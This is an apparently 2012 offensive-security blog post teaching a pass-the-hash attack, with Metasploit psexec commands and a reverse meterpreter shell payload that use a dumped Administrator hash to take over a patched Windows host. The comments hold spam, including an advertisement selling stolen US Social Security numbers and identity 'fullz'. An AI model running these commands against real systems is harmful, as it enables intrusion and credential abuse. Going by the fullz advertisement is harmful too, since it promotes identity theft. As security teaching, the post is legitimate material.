Wednesday, April 4, 2012

Passing-The-Hash

To me there are few things as elegant as a nice pass-the-hash attack. This should drive home to each of us the risk associated with sharing passwords between systems, especially ones of different security requirements.
With Pass-the-hash, a simple un-cracked hash can be used to compromise other systems using the same account.


How it works:
Once we gain root access to a system, one of the first things we do is grab password hashes, (demonstrated in a previous post), and we typically immediately jump to cracking these hashes. BUT, even an un-cracked hash can be useful. If other systems use the same credentials, we can simply pass the hash along to that system and it will happily accept it and execute code for us.

One method for accomplishing this task is to use the Windows Credential Editor (wce). Written by Hernan Ochoa, it is available from www.ampliasecurity.com/research.html
This tool essentially allows you to edit the memory space of the running LSASS process, replacing your credentials with your victim's username and hash. You can then interact with other systems using any built in windows tool (net use, reg, psexec), and you'll effectively impersonate the victim.
***Newer versions of the tool even allow you to use stolen Kerberos tokens (with the -k and -K options).

Now, there is a simpler method for doing a pass-the-hash attack. Since version 3.1, metasploit has a built in method for it in the psexec exploit. It is VERY EASY, as I'll demonstrate.

We're going to use a hash we've gained from target1 (old vulnerable Windows server), to gain access to target2 (windows XPsp3, fully patched).

First, we dump target1 hashes using the hashdump command, and we copy off Administrator's hash.




Now we start up msfconsole.
The exploit we want is psexec, and for a payload we will use a reverse meterpreter shell, so we issue these commands:
use windows/smb/psexec
set PAYLOAD windows/meterpreter/reverse_tcp
We then set the variables for RHOST (target#2's IP) and LHOST (our IP).
set RHOST "target2 IP"
set LHOST "Our IP"

Now comes the magic. We set the user and password variables. Metasploit will automatically recognize if a hash is used for SMBPass and will use pass-the-hash rather than a password attempt.
set SMBUser Administrator
set SMBPass 73a87bf2afc9ca49b69e407095566351:1c31f...
That's it, run "exploit".




As you can see, this set up the reverse handler, connected to port 445 on target2, and using the hash we supplied it was able to execute our payload, giving us a meterpreter shell.

Because of one unmanaged legacy system, we were able to thoroughly own a completely patched box.
Posted by at

7 comments:

  1. eaxJune 11, 2012 at 11:19 PM

    Why is such mechanism even possible? Only explanation that comes to mind is some bizzare implementation of token handling?

    ReplyDelete
    Replies
    1. AnonymousApril 20, 2022 at 1:09 AM

      7 Habits Of Highly Effective Hackers: Passing-The-Hash >>>>> Download Now

      >>>>> Download Full

      7 Habits Of Highly Effective Hackers: Passing-The-Hash >>>>> Download LINK

      >>>>> Download Now

      7 Habits Of Highly Effective Hackers: Passing-The-Hash >>>>> Download Full

      >>>>> Download LINK 9X

      Delete
  2. AnnaAugust 8, 2019 at 3:55 AM

    This comment has been removed by the author.

    ReplyDelete
  3. No NameAugust 28, 2020 at 5:18 PM

    Hello Everyone !

    USA SSN Leads/Fullz available, along with Driving License/ID Number with good connectivity.

    All SSN's are Tested & Verified.

    **DETAILS IN LEADS/FULLZ**

    ->FULL NAME
    ->SSN
    ->DATE OF BIRTH
    ->DRIVING LICENSE NUMBER
    ->ADDRESS WITH ZIP
    ->PHONE NUMBER, EMAIL
    ->EMPLOYEE DETAILS

    *Price for SSN lead $2
    *You can ask for sample before any deal
    *If you buy in bulk, will give you discount
    *Sampling is just for serious buyers

    ->Hope for the long term business
    ->You can buy for your specific states too

    **Contact 24/7**

    Whatsapp > +923172721122

    Email > leads.sellers1212@gmail.com

    Telegram > @leadsupplier

    ICQ > 752822040

    ReplyDelete
  4. aloneDecember 7, 2021 at 12:35 AM

    That's a great article! The neatly organized content is good to see. Can I quote a blog and write it on my blog? My blog has a variety of communities including these articles. Would you like to visit me later? keo nhacai


    ReplyDelete
  5. periyannanJanuary 27, 2022 at 8:40 PM

    blog is nice and much interesting which engaged me more.Spend a worthful time.keep updating more.

    artificial intelligence internship | best final year projects for cse | internship certificate online | internship for mba finance students | internship meaning in tamil


    ReplyDelete
  6. AnonymousApril 20, 2022 at 1:08 AM

    7 Habits Of Highly Effective Hackers: Passing-The-Hash >>>>> Download Now

    >>>>> Download Full

    7 Habits Of Highly Effective Hackers: Passing-The-Hash >>>>> Download LINK

    >>>>> Download Now

    7 Habits Of Highly Effective Hackers: Passing-The-Hash >>>>> Download Full

    >>>>> Download LINK WT

    ReplyDelete

Subscribe to: Post Comments (Atom)